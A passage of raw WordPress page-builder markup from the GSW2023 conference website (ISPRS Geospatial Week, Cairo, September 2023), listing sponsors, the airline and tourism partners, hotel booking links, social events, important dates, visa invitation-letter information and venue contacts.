height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner 